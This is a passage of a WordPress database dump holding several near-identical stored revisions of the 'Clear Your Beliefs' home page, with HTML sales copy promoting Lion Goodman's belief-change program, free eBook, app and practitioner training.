belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 23:33:31', '2014-11-13 04:33:31', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1738, 2, '2014-11-13 01:50:01', '2014-11-13 06:50:01', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-13 01:50:01', '2014-11-13 06:50:01', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1741, 2, '2014-11-13 19:00:21', '2014-11-14 00:00:21', '<img class="size-full wp-image-1457 aligncenter  img-responsive" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-13 19:00:21', '2014-11-14 00:00:21', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1740, 2, '2014-11-13 18:57:07', '2014-11-13 23:57:07', '<img class="size-full wp-image-1457 aligncenter  img-responsive" style="margin-left: 75px !important;width: 1035px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-13 18:57:07', '2014-11-13 23:57:07', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1739, 2, '2014-11-13 18:53:55', '2014-11-13 23:53:55', '<img class="size-full wp-image-1457 aligncenter img-responsive" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\r\n\r\nFree eBook\r\n\r\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\r\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\r\n\r\nFree App\r\n\r\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\r\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\r\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\r\n\r\nComplete Program\r\n<img style="margin-top: -20px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\r\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\r\n\r\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\r\n\r\nRelease pain and hurts from the past\r\nOpen to deeper, more profound love\r\nRecognize your true spiritual nature\r\nBecome more calm and less reactive\r\nRediscover the source of your personal power\r\n\r\nClear whatever stops you from taking action\r\nOpen yourself to new possibilities of success\r\nEliminate blocks and barriers easily\r\nDiscover your true purpose\r\nExpress your true magnificence\r\n\r\n<h2>How and Why It Works So Well</h2>\r\n\r\nBeliefs are the major cause of unhappiness, upsets, and limitations.\r\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\r\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\r\nYou''re in charge – you decide what you want to believe, and how far you want to go.\r\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\r\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\r\n\r\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\r\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\r\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\r\n\r\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\r\n\r\nSo the important questions are:\r\n\r\n <em>What do I want to experience?</em>\r\n<em>What belief is creating this experience I don''t want?</em>\r\n<em>How can I change my belief so I can change my experience?</em>\r\n\r\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\r\n\r\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\r\n\r\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\r\n\r\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\r\n\r\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\r\n\r\nWarmly,\r\n\r\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\r\n\r\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-13 18:53:55', '2014-11-13 23:53:55', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1744, 2, '2014-11-14 01:06:44', '2014-11-14 06:06:44', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;padding-top: 10px;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 01:06:44', '2014-11-14 06:06:44', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1746, 2, '2014-11-14 01:43:34', '2014-11-14 06:43:34', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;padding-top: 10px;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  